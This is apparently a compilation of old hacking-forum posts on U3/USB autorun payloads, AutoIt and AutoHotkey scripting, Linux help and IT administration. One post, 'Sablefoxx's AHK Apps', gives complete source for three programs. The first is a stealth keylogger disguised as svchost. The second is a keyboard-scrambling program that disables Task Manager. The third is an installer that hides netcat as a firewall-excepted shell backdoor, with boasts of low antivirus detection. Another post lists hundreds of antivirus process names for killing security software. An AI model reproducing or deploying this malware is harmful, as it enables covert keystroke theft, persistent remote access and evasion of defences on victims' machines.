[U3 and Non-U3 AutoIT payload]

I downloaded the files and now I'm reading the au3 files. What's the purpose of GUI.au3?

Is the original host files copied and reinstalled after the iso is updated?

:edit answered

FileCopy( @SystemDir & "\drivers\etc\hosts", @SystemDir & "\drivers\etc\hosts.orig" )
..
..
If FileExists( @SystemDir & "\drivers\etc\hosts.orig")  Then
FileCopy( @SystemDir & "\drivers\etc\hosts.orig", @SystemDir & "\drivers\etc\hosts" )

WOW!

yeah thast what i made it do

[U3 and Non-U3 AutoIT payload]

Posting u3 dev enviroment. ver .01b

http://dl.getdropbox.com/u/332413/u3dev/u3dev.7z

[Alternative Method to Kill AV's.]

MEtasploit comes with a ruby script to disable av which works the same as the old way but had a nice good list of process names of av.

_avp32.exe

_avpcc.exe

_avpm.exe

ackwin32.exe

adaware.exe

advxdwin.exe

agentsvr.exe

agentw.exe

alertsvc.exe

alevir.exe

alogserv.exe

amon9x.exe

anti-trojan.exe

antivirus.exe

ants.exe

apimonitor.exe

aplica32.exe

apvxdwin.exe

arr.exe

atcon.exe

atguard.exe

atro55en.exe

atupdater.exe

atwatch.exe

au.exe

aupdate.exe

auto-protect.nav80try.exe

autodown.exe

autotrace.exe

autoupdate.exe

avconsol.exe

ave32.exe

avgcc32.exe

avgctrl.exe

avgnt.exe

avguard.exe

avkserv.exe

avnt.exe

avp.exe

avp.exe

avp32.exe

avpcc.exe

avpdos32.exe

avpm.exe

avptc32.exe

avpupd.exe

avsched32.exe

avwin.exe

avwin95.exe

avwupd32.exe

blackd.exe

blackice.exe

cfiadmin.exe

cfiaudit.exe

cfinet.exe

cfinet32.exe

claw95.exe

claw95cf.exe

cleaner.exe

cleaner3.exe

defwatch.exe

dvp95.exe

dvp95_0.exe

ecengine.exe

esafe.exe

espwatch.exe

f-agnt95.exe

f-prot.exe

f-prot95.exe

f-stopw.exe

findviru.exe

fp-win.exe

fprot.exe

frw.exe

iamapp.exe

iamserv.exe

ibmasn.exe

ibmavsp.exe

icload95.exe

icloadnt.exe

icmon.exe

icsupp95.exe

icsuppnt.exe

iface.exe

iomon98.exe

jedi.exe

lockdown2000.exe

lookout.exe

luall.exe

moolive.exe

mpftray.exe

n32scanw.exe

navapw32.exe

navlu32.exe

navnt.exe

navw32.exe

navwnt.exe

nisum.exe

nmain.exe

normist.exe

nupgrade.exe

nvc95.exe

outpost.exe

padmin.exe

pavcl.exe

pavsched.exe

pavw.exe

pccwin98.exe

pcfwallicon.exe

persfw.exe

rav7.exe

rav7win.exe

rescue.exe

safeweb.exe

scan32.exe

scan95.exe

scanpm.exe

scrscan.exe

serv95.exe

smc.exe

sphinx.exe

sweep95.exe

tbscan.exe

tca.exe

tds2-98.exe

tds2-nt.exe

vet95.exe

vettray.exe

vscan40.exe

vsecomr.exe

vshwin32.exe

vsstat.exe

webscanx.exe

wfindv32.exe

zonealarm.exe

avgserv.exe

avgserv9.exe

avguard.exe

avgw.exe

avkpop.exe

avkserv.exe

avkservice.exe

avkwctl9.exe

avltmain.exe

avnt.exe

avp.exe

avp32.exe

avpcc.exe

avpdos32.exe

avpm.exe

avptc32.exe

avpupd.exe

avpupd.exe

avsched32.exe

avsynmgr.exe

avwinnt.exe

avwupd.exe

avwupd32.exe

avwupd32.exe

avwupsrv.exe

avxmonitor9x.exe

avxmonitornt.exe

avxquar.exe

avxquar.exe

backweb.exe

bargains.exe

bd_professional.exe

beagle.exe

belt.exe

bidef.exe

bidserver.exe

bipcp.exe

bipcpevalsetup.exe

bisp.exe

blackd.exe

blackice.exe

blss.exe

bootconf.exe

bootwarn.exe

borg2.exe

bpc.exe

brasil.exe

bs120.exe

bundle.exe

bvt.exe

ccapp.exe

ccevtmgr.exe

ccpxysvc.exe

cdp.exe

cfd.exe

cfgwiz.exe

cfiadmin.exe

cfiaudit.exe

cfiaudit.exe

cfinet.exe

cfinet32.exe

claw95cf.exe

clean.exe

cleaner.exe

cleaner3.exe

cleanpc.exe

click.exe

cmd.exe

cmd32.exe

cmesys.exe

cmgrdian.exe

cmon016.exe

connectionmonitor.exe

cpd.exe

cpf9x206.exe

cpfnt206.exe

ctrl.exe

cv.exe

cwnb181.exe

cwntdwmo.exe

datemanager.exe

dcomx.exe

defalert.exe

defscangui.exe

defwatch.exe

deputy.exe

divx.exe

dllcache.exe

dllreg.exe

doors.exe

dpf.exe

dpfsetup.exe

dpps2.exe

drwatson.exe

drweb32.exe

drwebupw.exe

dssagent.exe

dvp95.exe

dvp95_0.exe

ecengine.exe

efpeadm.exe

emsw.exe

ent.exe

esafe.exe

escanhnt.exe

escanv95.exe

espwatch.exe

ethereal.exe

etrustcipe.exe

evpn.exe

exantivirus-cnet.exe

exe.avxw.exe

expert.exe

explore.exe

fameh32.exe

fast.exe

fch32.exe

fih32.exe

findviru.exe

firewall.exe

fnrb32.exe

fprot.exe

f-prot.exe

f-prot95.exe

fp-win.exe

fp-win_trial.exe

frw.exe

fsaa.exe

fsav.exe

fsav32.exe

fsav530stbyb.exe

fsav530wtbyb.exe

fsav95.exe

fsgk32.exe

fsm32.exe

fsma32.exe

fsmb32.exe

f-stopw.exe

gator.exe

gbmenu.exe

gbpoll.exe

generics.exe

gmt.exe

guard.exe

guarddog.exe

hacktracersetup.exe

hbinst.exe

hbsrv.exe

hotactio.exe

hotpatch.exe

htlog.exe

htpatch.exe

hwpe.exe

hxdl.exe

hxiul.exe

iamapp.exe

iamserv.exe

iamstats.exe

ibmasn.exe

ibmavsp.exe

icloadnt.exe

icmon.exe

icsupp95.exe

icsuppnt.exe

idle.exe

iedll.exe

iedriver.exe

iexplorer.exe

iface.exe

ifw2000.exe

inetlnfo.exe

infus.exe

infwin.exe

init.exe

intdel.exe

intren.exe

iomon98.exe

istsvc.exe

jammer.exe

jdbgmrg.exe

jedi.exe

kavlite40eng.exe

kavpers40eng.exe

kavpf.exe

kazza.exe

keenvalue.exe

kerio-pf-213-en-win.exe

kerio-wrl-421-en-win.exe

kerio-wrp-421-en-win.exe

kernel32.exe

killprocesssetup161.exe

launcher.exe

ldnetmon.exe

ldpro.exe

ldpromenu.exe

ldscan.exe

lnetinfo.exe

loader.exe

localnet.exe

lockdown.exe

lockdown2000.exe

lookout.exe

lordpe.exe

lsetup.exe

luall.exe

luall.exe

luau.exe

lucomserver.exe

luinit.exe

luspt.exe

mapisvc32.exe

mcagent.exe

mcmnhdlr.exe

mcshield.exe

mctool.exe

mcupdate.exe

mcupdate.exe

mcvsrte.exe

mcvsshld.exe

md.exe

mfin32.exe

mfw2en.exe

mfweng3.02d30.exe

mgavrtcl.exe

mgavrte.exe

mghtml.exe

mgui.exe

minilog.exe

mmod.exe

monitor.exe

moolive.exe

mostat.exe

mpfagent.exe

mpfservice.exe

mpftray.exe

mrflux.exe

msapp.exe

msbb.exe

msblast.exe

mscache.exe

msccn32.exe

mscman.exe

msconfig.exe

msdm.exe

msdos.exe

msiexec16.exe

msinfo32.exe

mslaugh.exe

msmgt.exe

msmsgri32.exe

mssmmc32.exe

mssys.exe

msvxd.exe

mu0311ad.exe

mwatch.exe

n32scanw.exe

nav.exe

navap.navapsvc.exe

navapsvc.exe

navapw32.exe

navdx.exe

navlu32.exe

navnt.exe

navstub.exe

navw32.exe

navwnt.exe

nc2000.exe

ncinst4.exe

ndd32.exe

neomonitor.exe

neowatchlog.exe

netarmor.exe

netd32.exe

netinfo.exe

netmon.exe

netscanpro.exe

netspyhunter-1.2.exe

netstat.exe

netutils.exe

nisserv.exe

nisum.exe

nmain.exe

nod32.exe

normist.exe

norton_internet_secu_3.0_407.exe

notstart.exe

npf40_tw_98_nt_me_2k.exe

npfmessenger.exe

nprotect.exe

npscheck.exe

npssvc.exe

nsched32.exe

nssys32.exe

nstask32.exe

nsupdate.exe

nt.exe

ntrtscan.exe

ntvdm.exe

ntxconfig.exe

nui.exe

nupgrade.exe

nupgrade.exe

nvarch16.exe

nvc95.exe

nvsvc32.exe

nwinst4.exe

nwservice.exe

nwtool16.exe

ollydbg.exe

onsrvr.exe

optimize.exe

ostronet.exe

otfix.exe

outpost.exe

outpost.exe

outpostinstall.exe

outpostproinstall.exe

padmin.exe

panixk.exe

patch.exe

pavcl.exe

pavproxy.exe

pavsched.exe

pavw.exe

pcfwallicon.exe

pcip10117_0.exe

pcscan.exe

pdsetup.exe

periscope.exe

persfw.exe

perswf.exe

pf2.exe

pfwadmin.exe

pgmonitr.exe

pingscan.exe

platin.exe

pop3trap.exe

poproxy.exe

popscan.exe

portdetective.exe

portmonitor.exe

powerscan.exe

ppinupdt.exe

pptbc.exe

ppvstop.exe

prizesurfer.exe

prmt.exe

prmvr.exe

procdump.exe

processmonitor.exe

procexplorerv1.0.exe

programauditor.exe

proport.exe

protectx.exe

pspf.exe

purge.exe

qconsole.exe

qserver.exe

rapapp.exe

rav7.exe

rav7win.exe

rav8win32eng.exe

ray.exe

rb32.exe

rcsync.exe

realmon.exe

reged.exe

regedit.exe

regedt32.exe

rescue.exe

rescue32.exe

rrguard.exe

rshell.exe

rtvscan.exe

rtvscn95.exe

rulaunch.exe

run32dll.exe

rundll.exe

rundll16.exe

ruxdll32.exe

safeweb.exe

sahagent.exe

save.exe

savenow.exe

sbserv.exe

sc.exe

scam32.exe

scan32.exe

scan95.exe

scanpm.exe

scrscan.exe

setup_flowprotector_us.exe

setupvameeval.exe

sfc.exe

sgssfw32.exe

sh.exe

shellspyinstall.exe

shn.exe

showbehind.exe

smc.exe

sms.exe

smss32.exe

soap.exe

sofi.exe

sperm.exe

spf.exe

sphinx.exe

spoler.exe

spoolcv.exe

spoolsv32.exe

spyxx.exe

srexe.exe

srng.exe

ss3edit.exe

ssg_4104.exe

ssgrate.exe

st2.exe

start.exe

stcloader.exe

supftrl.exe

support.exe

supporter5.exe

svc.exe

svchostc.exe

svchosts.exe

svshost.exe

sweep95.exe

sweepnet.sweepsrv.sys.swnetsup.exe

symproxysvc.exe

symtray.exe

sysedit.exe

system.exe

system32.exe

sysupd.exe

taskmg.exe

taskmgr.exe

taskmo.exe

taskmon.exe

taumon.exe

tbscan.exe

tc.exe

tca.exe

tcm.exe

tds2-nt.exe

tds-3.exe

teekids.exe

tfak.exe

tfak5.exe

tgbob.exe

titanin.exe

titaninxp.exe

tracert.exe

trickler.exe

trjscan.exe

trjsetup.exe

trojantrap3.exe

tsadbot.exe

tvmd.exe

tvtmd.exe

undoboot.exe

updat.exe

update.exe

update.exe

upgrad.exe

utpost.exe

vbcmserv.exe

vbcons.exe

vbust.exe

vbwin9x.exe

vbwinntw.exe

vcsetup.exe

vet32.exe

vet95.exe

vettray.exe

vfsetup.exe

vir-help.exe

virusmdpersonalfirewall.exe

vnlan300.exe

vnpc3000.exe

vpc32.exe

vpc42.exe

vpfw30s.exe

vptray.exe

vscan40.exe

vscenu6.02d30.exe

vsched.exe

vsecomr.exe

vshwin32.exe

vsisetup.exe

vsmain.exe

vsmon.exe

vsstat.exe

vswin9xe.exe

vswinntse.exe

vswinperse.exe

w32dsm89.exe

w9x.exe

watchdog.exe

webdav.exe

webscanx.exe

webtrap.exe

wfindv32.exe

whoswatchingme.exe

wimmun32.exe

win32.exe

win32us.exe

winactive.exe

win-bugsfix.exe

window.exe

windows.exe

wininetd.exe

wininit.exe

wininitx.exe

winlogin.exe

winmain.exe

winnet.exe

winppr32.exe

winrecon.exe

winservn.exe

winssk32.exe

winstart.exe

winstart001.exe

wintsk32.exe

winupdate.exe

wkufind.exe

wnad.exe

wnt.exe

wradmin.exe

wrctrl.exe

wsbgate.exe

wupdater.exe

wupdt.exe

wyvernworksfirewall.exe

xpf202en.exe

zapro.exe

zapsetup3001.exe

zatutor.exe

zonalm2601.exe

zonealarm.exe

[Bootable U3 / Switchblade]

Yes you can!!

I have done so with my U3 drive.

It has backtrack 3 bootable, where as If I plug it into a computer(thats capable of booting from USB) and turn on the computer, and select boot from USB on the boot menu (after pressing the right key usually F12) it will boot up backtrack 3 instead of the host OS.

Also if I plug my device into any Windows XP machine my custom ISO will autorun my app. (it doesn't work on vista though)

So yes its possible to make your drive bootable, and still have your U3 autorun intact for windows machines...

With backtrack 3 its simple to set the drive up to boot, follow the instructions. Just make sure you change the MBR of your USB drive not anything else!!

what version of U3 drive did you use ? i been looking into preserving the u3 functionality and booting...

ive already make a backtrack bootable usbdrive before but it wasnt u3.... did you use the same process?

[easy program to make gui's in linux]

kool looking at the page there is a lot of frameworks. what would you recommend for first timer with python? any really good tuts you recommend?

it really depends on what you are developing for... if i was developing an app for windows id just use the native windows api but if i wanted something cross platform i might use gtk honestly i dont use gui's hardly at all in my programming... i prefer the cli

As far as tutorials i always find it easiest to pick apart the examples that the dev kits usually come with in order to figure it out.

[How to Clone laptop HDD to portable USB HDD?]

there alot of options for this...

in the open source area you have clonezilla which is a clone of ghost

theres also dd which is my fave...

none opensource stuff that ive used is ghost which works well.

also acronis true image

really though the best is dd if you learn how to use that because it does a bit for bit exact copy... alot of these other programs compress the freespace which speeds up the process and makes the image smaller but if you want an exact copy then you should use dd. Ive had unpredictable things happen with the mbr when using tools other then dd. Plus dd works over netcat nicely in case you wanted to do it over the network.

[I need help with linux]

I'm not exactly sure where you got the tar package from, but I was able to find pre-compiled versions of the RTL8187SE wifi module for Ubuntu. Assuming that this is the module that corresponds to your wifi card, the easist way to get your wireless working would be to download the .deb package.

I found it here and according to the author's website the latest version of the package is this one.

There is a longer list of other packages, including for 8.04 here.

I'm pretty sure that it should install with

dpkg --install name-of-package.deb

If it tells you that there are unmet dependencies, try

apt-get install name-of-whatever-it-complains-about name-of-something-else

Hope that helps.

Also, should mention, I've never used it, but I believe that Linux Mint is basically Ubuntu made easy (which was supposed to be Debain made easy). You might want to try that.

mint linux is just as easy as regular ubuntu but mint is prettier.

[easy program to make gui's in linux]

http://wiki.python.org/moin/GuiProgramming

[Windows/Linux Live Studio]

for a production environment you should use actual hardware. Have one input going into your computer and the multiple inputs going into a receiver or a switch that you change depending on what you want to show.

[easy program to make gui's in linux]

hi,

i was just wondering if there was some sort of scripting language for linux simmiler to autoIT (www.autoitscript.com).

using autoIT you can create a nice and simple GUI for a script instead of the CLI interface. is there a program similer.

also im kinda new to the scripting side of linux

python

[about CDFS]

theres two choices now the first is to use the universal customizer and the other is using lpinstaller.... here is the link for using the lpinstaller on a vista machine simaler to what you were takling about i actually wrote a tool in autoIT to make it easier

http://hak5.org/forums/index.php?showtopic=10392

[Sablefoxx's AHK Apps]

Did you really feel the need to quote the WHOLE source?

why not?

[Sablefoxx's AHK Apps]

WARNING VERY LONG POST!

For sometime now, i've been coding stuff in c, in fact i wrote versions of keyl and keyr in c, then i found ahk while trying to find a way to install my cmdo payload in a single .exe, turns out ahk has been used on this forum before, but i forgot about it until a few days ago. AHK is an awesome scripting lang that takes all the hard work out of keyboard hooks! So i re-wrote the apps, and here is the ahk source code, so everyone can learn how fun and easy this scripting lang is. Post bugs if you find them, and have fun! Feel free to hack/mod/use this code anyway you want (works nicely with usb payloads). :)

None of these programs are illegal. Morality and legality lie in the application of knowledge, not in the information itself.

PM/IRC/AIM me with questions.

PROGRAMS AND FEATURES

1. Keyr

-Randomizes Keys on the keyboard

-Adds itself to startup (regkey)

-Works on WinXP / Vista

-Disables Task Mgr (regkey)

-Press WinKey + X to quit

-Only about 10% of AntiVirus found it (VirusTotal)

[Download keyr v1]

MD5...: de40e57473c719d84da9b1a9e2527a86

2. Keyl

-Your basic keylogger, saves keystrokes to C:\WINDOWS\keyl.txt

-Adds itself to startup (RegKey)

-Completely Stealthed

-Looks like svchost while running

-Works on XP / Vista

-Press WinKey + X to quit

-Only about 5% of AntiVirus found it (VirusTotal)

[Download keyl v1.1]

MD5...: ebb7ab566064661707956a64be7f01b3

3. Cmdo

-Updated Cmdo Payload

-Installs a Netcat backdoor (reverse shell)

-Single .exe Install File

-Adds itself to startup (regkey)

-Completely Stealthed

-In XP adds itself to the firewall exceptions list, and hides itself from the GUI

-Easy to use Auto Connect Script

-Downside is nc.exe has 68% detection rate (VirusTotal)

[Download cmdo v1]

MD5...: 260f8f4566635734a8c663358752c108

AHK SOURCE CODE

So basically for all of them, there is the actual .exe's (contain the payload), and the install file, the install file only needs to be run once, and it adds regkeys/makes dirs/sets attribs/etc, i commented the code best i could

>Keyr

keyr_install.exe

;Install Keyr.exe into root of C:
;Keyr Script has to be compiled first!
#NoTrayIcon
FileInstall, .\keyr.exe, C:\keyr.exe
;add to startup
RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,keyr,C:\keyr.exe
;disable task mgr
RegWrite REG_DWORD,HKEY_CURRENT_USER,software\microsoft\windows\currentversion\policies\system,DisableTaskMgr,1
FileSetAttrib, +SH, C:\keyr.exe
Run C:\keyr.exe
ExitApp

keyr.exe

;KeyStroke Randomizer
;keyr.exe v1.0
;By SableFoXx

#NoEnv
#NoTrayIcon
#InstallKeybdHook

#x::
MsgBox, Exit Function Invoked
ExitApp

;----------------
;  ALPHA KEYS
;----------------
; The $ stops recusrion
$a::GetAlpha()
$b::GetAlpha()    
$c::GetAlpha()
$d::GetAlpha()
$e::GetAlpha()
$f::GetAlpha()
$g::GetAlpha()
$h::GetAlpha()
$i::GetAlpha()
$j::GetAlpha()
$k::GetAlpha()
$l::GetAlpha()
$m::GetAlpha()
$n::GetAlpha()
$o::GetAlpha()
$p::GetAlpha()
$q::GetAlpha()
$r::GetAlpha()
$s::GetAlpha()
$t::GetAlpha()
$u::GetAlpha()
$v::GetAlpha()
$w::GetAlpha()
;$x::GetAlpha() - Only if you're evil
$y::GetAlpha()
$z::GetAlpha()
; Don't Forget CAPS!
$+a::GetAlpha()
$+b::GetAlpha()    
$+c::GetAlpha()
$+d::GetAlpha()
$+e::GetAlpha()
$+f::GetAlpha()
$+g::GetAlpha()
$+h::GetAlpha()
$+i::GetAlpha()
$+j::GetAlpha()
$+k::GetAlpha()
$+l::GetAlpha()
$+m::GetAlpha()
$+n::GetAlpha()
$+o::GetAlpha()
$+p::GetAlpha()
$+q::GetAlpha()
$+r::GetAlpha()
$+s::GetAlpha()
$+t::GetAlpha()
$+u::GetAlpha()
$+v::GetAlpha()
$+w::GetAlpha()
$+x::GetAlpha()
$+y::GetAlpha()
$+z::GetAlpha()

CapsLock::MsgBox, WARNING: This Button Does Nothing!

;----------------
;    NUM KEYS
;----------------
$0::GetNum()
$1::GetNum()
$2::GetNum()
$3::GetNum()
$4::GetNum()
$5::GetNum()
$6::GetNum()
$7::GetNum()
$8::GetNum()
$9::GetNum()
$Numpad0::GetNum()
$Numpad1::GetNum()
$Numpad2::GetNum()
$Numpad3::GetNum()
$Numpad4::GetNum()
$Numpad5::GetNum()
$Numpad6::GetNum()
$Numpad7::GetNum()
$Numpad8::GetNum()
$Numpad9::GetNum()

;Fun-Sions

GetNum(){
    Random, num, 0, 10
    if(num = 10)
        Shutdown, 4
    else
        SendInput, %num%
}

GetAlpha(){
; I wish i could so a switch()
Random, alpha, 1, 26
    
If(alpha = 1)
    SendInput, a
If(alpha = 2)

    SendInput, b
If(alpha = 3)
    SendInput, c
If(alpha = 4)
    SendInput, d
If(alpha = 5)
    SendInput, e
If(alpha = 6)
    SendInput, f
If(alpha = 7)
    SendInput, g
If(alpha = 8)
    SendInput, h
If(alpha = 9)
    SendInput, i
If(alpha = 10)
    SendInput, j
If(alpha = 11)
    SendInput, k
If(alpha = 12)
    SendInput, l
If(alpha = 13)
    SendInput, m
If(alpha = 14)
    SendInput, n
If(alpha = 15)
    SendInput, o
If(alpha = 16)
    SendInput, p
If(alpha = 17)
    SendInput, q
If(alpha = 18)
    SendInput, r
If(alpha = 19)
    SendInput, s
If(alpha = 20)
    SendInput, t
If(alpha = 21)
    SendInput, u
If(alpha = 22)
    SendInput, v
If(alpha = 23)
    SendInput, w
If(alpha = 24)
    SendInput, x
If(alpha = 25)
    SendInput, y
If(alpha = 26)
    SendInput, z
}

; -=d0tmayhem=-

>keyl

keyl_install.exe

;Install Svchost.exe into the root C:\
;Keyl Script has to be compiled first,
;and renamed to svchost, after being compiled
;==============================================
#NoTrayIcon

;Remove old one
IfNotExist, C:\svchost.exe, goto install
SendInput, #x
Sleep, 1000
FileSetAttrib, -SH, C:\svchost.exe

install:
FileInstall, .\svhost.exe, C:\svhost.exe, 1
RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\svchost.exe


FileSetAttrib, +SH, C:\svchost.exe
Run, C:\svchost.exe
ExitApp

keyl.exe

;=======================
; Keylogger (keyl.exe)
; By SableFoXx
; v1.1
;=======================

#NoEnv
#NoTrayIcon
#InstallKeybdHook
#SingleInstance, Force

SetWorkingDir %SystemRoot%
FileAppend, `n[%A_MM%/%A_DD%/%A_YYYY% %A_hour%:%A_min%], C:\WINDOWS\keyl.txt
Spc := " "

#x::
;WinKey + X to stop program
MsgBox, 0, -=d0tmayhem=-, Keyl has been stopped, 10
ExitApp

;----------------
;  ALPHA KEYS
;----------------
$a::AlphaKey("a", "A")
$b::AlphaKey("b", "B")
$c::AlphaKey("c", "C")
$d::AlphaKey("d", "D")
$e::AlphaKey("e", "E")
$f::AlphaKey("f", "F")
$g::AlphaKey("g", "G")
$h::AlphaKey("h", "H")
$i::AlphaKey("i", "I")
$j::AlphaKey("j", "J")
$k::AlphaKey("k", "K")
$l::AlphaKey("l", "L")
$m::AlphaKey("m", "M")
$n::AlphaKey("n", "N")
$o::AlphaKey("o", "O")
$p::AlphaKey("p", "P")
$q::AlphaKey("q", "Q")
$r::AlphaKey("r", "R")
$s::AlphaKey("s", "S")
$t::AlphaKey("t", "T")
$u::AlphaKey("u", "U")
$v::AlphaKey("v", "V")
$w::AlphaKey("w", "W")
$x::AlphaKey("x", "X")
$y::AlphaKey("y", "Y")
$z::AlphaKey("z", "Z")
;**Caps Keys**
$+a::TransKey("+a", "A")
$+b::TransKey("+b", "B")
$+c::TransKey("+c", "C")
$+d::TransKey("+d", "D")
$+e::TransKey("+e", "E")
$+f::TransKey("+f", "F")
$+g::TransKey("+g", "G")
$+h::TransKey("+h", "H")
$+i::TransKey("+i", "I")
$+j::TransKey("+j", "J")
$+k::TransKey("+k", "K")
$+l::TransKey("+l", "L")
$+m::TransKey("+m", "M")
$+n::TransKey("+n", "N")
$+o::TransKey("+o", "O")
$+p::TransKey("+p", "P")
$+q::TransKey("+q", "Q")
$+r::TransKey("+r", "R")
$+s::TransKey("+s", "S")
$+t::TransKey("+t", "T")
$+u::TransKey("+u", "U")
$+v::TransKey("+v", "V")
$+w::TransKey("+w", "W")
$+x::TransKey("+x", "X")
$+y::TransKey("+y", "Y")
$+z::TransKey("+z", "Z")

;----------------
;   NUM KEYS
;----------------
$0::GenKey("0")
$1::GenKey("1")
$2::GenKey("2")
$3::GenKey("3")
$4::GenKey("4")
$5::GenKey("5")
$6::GenKey("6")
$7::GenKey("7")
$8::GenKey("8")
$9::GenKey("9")
;**Numpad Keys**
$Numpad0::GenKey("0")
$Numpad1::GenKey("1")
$Numpad2::GenKey("2")
$Numpad3::GenKey("3")
$Numpad4::GenKey("4")
$Numpad5::GenKey("5")
$Numpad6::GenKey("6")
$Numpad7::GenKey("7")
$Numpad8::GenKey("8")
$Numpad9::GenKey("9")
;**NumPad Symbls**
$NumpadDot::GenKey(".")
$NumpadDiv::GenKey("/")
$NumpadSub::GenKey("-")
$NumpadMult::GenKey("*")
$NumpadAdd::ModfKey("+")
$NumpadDel::ModfKey("Del")
$NumpadEnd::ModfKey("End")
$NumpadHome::ModfKey("Home")
$NumpadPgUp::ModfKey("PgUp")
$NumpadPgDn::ModfKey("PgDn")
$NumpadIns::ModfKey("Insert")
$NumpadEnter::ModfKey("Enter")

;----------------
;   FUNC KEYS
;----------------
$F1::ModfKey("F1")
$F2::ModfKey("F2")
$F3::ModfKey("F3")
$F4::ModfKey("F4")
$F5::ModfKey("F5")
$F6::ModfKey("F6")
$F7::ModfKey("F7")
$F8::ModfKey("F8")
$F9::ModfKey("F9")
$F10::ModfKey("F10")
$F11::ModfKey("F11")
$F12::ModfKey("F12")

;----------------
;   SYBL KEYS
;----------------
$+0::TransKey("+0", ")")
$+3::TransKey("+3", "#")
$+4::TransKey("+4", "$")
$+5::TransKey("+5", "%")
$+6::TransKey("+6", "^")
$+7::TransKey("+7", "&")
$+8::TransKey("+8", "*")
$+9::TransKey("+9", "(")

$-::GenKey("-")
$=::GenKey("=")
$[::GenKey("[")
$]::GenKey("]")
$;::GenKey(";")
$'::GenKey("'")
$,::GenKey(",")
$.::GenKey(".")
$/::GenKey("/")
$\::GenKey("\")
$+-::GenKey("_")
$+`::GenKey("~")
$+;::GenKey(":")
$+,::GenKey("<")
$+.::GenKey(">")
$+/::GenKey("?")
$+\::GenKey("|")

$+[::ModfKey("{")
$+]::ModfKey("}")
$+=::ModfKey("+")
$`::TransKey("``", "``")

;----------------
;   SPCL KEYS
;----------------
;These are used by ahotkey
;and need SendRaw to work

$+1::
SendRaw, !
FileAppend, !, C:\WINDOWS\keyl.txt
Return

$+2::
SendRaw, @
FileAppend, @, C:\WINDOWS\keyl.txt
Return

$+'::
SendRaw, "
FileAppend, ", C:\WINDOWS\keyl.txt
Return

;----------------
;   MODF KEYS
;----------------
$!::ModfKey("Alt")
$^::ModfKey("Ctrl")
$Tab::ModfKey("Tab")
$End::ModfKey("End")
$Home::ModfKey("Home")
$PgUp::ModfKey("PgUp")
$PgDn::ModfKey("PgDn")
$Enter::ModfKey("Enter")
$Pause::ModfKey("Pause")
$+Pause::ModfKey("Break")
$Insert::ModfKey("Insert")
$Delete::ModfKey("Delete")
$Backspace::ModfKey("Backspace")
$PrintScreen::ModfKey("PrintScreen")

$CapsLock::CapsLock()

$Space::
SendInput, {Space}
FileAppend, %Spc%, C:\WINDOWS\keyl.txt
Return

;========================================================
;                                       FUNCTIONS
;========================================================
;GenKey   - Generic Key, takes one argument (the keystroke), appends same value to log
;Alpahkey - Takes the lower(akey)/upper(ukey) case alpha value and returns a lower, or upper 
;        depending on the state in which CapsLock is set
;TransKey - Translate Key, takes two arguments, the first is the raw keystroke (skey) and
;           the secound is the alrdy translated key you want appended to the log file (xkey)
;ModfKey  - Modifer Key, these are your ALT, WIN, and TAB keys, the arg should be the string you
;           want passed to SendInput, Modf key strokes are marked with "[" and "]" in the log file
;CapsLock - First finds what state the CapsLock is in, then toggles it and appends the log
;           file with either [CAPS-ON] or [CAPS-OFF]

GenKey(gkey){
    SendInput, %gkey%
    FileAppend, %gkey%, C:\WINDOWS\keyl.txt
}
AlphaKey(akey, ukey){
    state := GetKeyState("Capslock", "T")
    if(state == "0"){
        SendInput, %akey%
        FileAppend, %akey%, C:\WINDOWS\keyl.txt
    }else{
        SendInput, %ukey%
        FileAppend, %ukey%, C:\WINDOWS\keyl.txt
     }
}
TransKey(skey, xkey){
    SendInput, %skey%
    FileAppend, %xkey%, C:\WINDOWS\keyl.txt
}
ModfKey(mkey){
    SendInput, {%mkey%}
    FileAppend, [%mkey%], C:\WINDOWS\keyl.txt
}    
CapsLock(){    
    state := GetKeyState("Capslock", "T")

    if(state == "1"){
        SetCapsLockState, Off
        FileAppend, [CAPS-OFF], C:\WINDOWS\keyl.txt
    }else{
        SetCapsLockState, On
        FileAppend, [CAPS-ON], C:\WINDOWS\keyl.txt
    }
}

; -=d0tmayhem=-

>Cmdo [Download .exes]

cmdo_install.exe

;Setup Cmdo Payload
;By SableFoXx
#NoEnv
#NoTrayIcon

FileCreateDir, C:\cmdo
FileSetAttrib, +SH, C:\cmdo

FileInstall, .\cmdo.exe, C:\cmdo\cmdo.exe
FileInstall, .\hidec.exe, C:\cmdo\hidec.exe
FileInstall, .\nc.exe, C:\cmdo\nc.exe

FileSetAttrib, +SH, C:\cmdo\cmdo.exe
FileSetAttrib, +SH, C:\cmdo\hidec.exe
FileSetAttrib, +SH, C:\cmdo\nc.exe

;Startup Key XP / VISTA
RegWrite REG_SZ,HKEY_LOCAL_MACHINE,software\microsoft\windows\currentversion\run,svchost,C:\cmdo\cmdo.exe

IfExist C:\WINDOWS\system32\wuapp.exe
goto done

xp:
;XP Firewall Key
RegWrite REG_SZ,HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List,C:\cmdo\nc.exe,C:\cmdo\nc.exe:*:Enabled:@xpsp2res.dll,-22019
goto done

done:
Run, C:\cmdo\cmdo.exe
ExitApp

cmdo.exe

;Cmdo.exe
;by SableFoXx
;Runs NC

#NoEnv
#NoTrayIcon
#SingleInstance, Force

Run, C:\cmdo\hidec.exe nc.exe -l -t -p 69 -d -e cmd.exe

ExitApp

Information is Free

Damn that was a long post :)

whats the cpu load for the keylogger?

[Good file sharing NAS (mostly SFTP)]

This client of ours wants a simple FTP server with permissions and groups. We started out with an ubuntu server 8.10, but permission settings were beginning to be a hassle.

We hooked them up with the latest version of FreeNAS, but we're just having too many problems with permissions on the SFTP... I'm about 2 days away from saying %#@$ it and making them buy windows server 2003 to just vpn over and use network shared resources.

I looked for a good guide on how to configure file permissions for groups of people, but i'm having a really hard time getting chmod/chown to work on a specific user/folder.

Does anyone know of an sftp / smb server program that lets the admin configure user permissions on certain folders? Or of a site that does a good job explaining how to use permissions on linux?

read the freenas manual

[Unlocking a locked workstation?]

I don't think there's a good tech way to solve this problem. It seems like the problem would solve itself the first time they're busy with something, call you, walk away, and come back to see you hadn't done anything waiting on them.

I mean, if they're calling you for help, can't you just tell them to wait for you to get there or to make sure their screen isn't locked when you arrive?

actually there is a good way to fix all this. Like I had mentioned before logon scripts and using the GPO editor to manipulate group policy's.

then use Ultra vnc to remote control if need be....

even if you installed ssh you could run scripts to fix whatever is wrong with thier setup.

[PsTools, how]

psexec you need admin privelegest to run over the network...

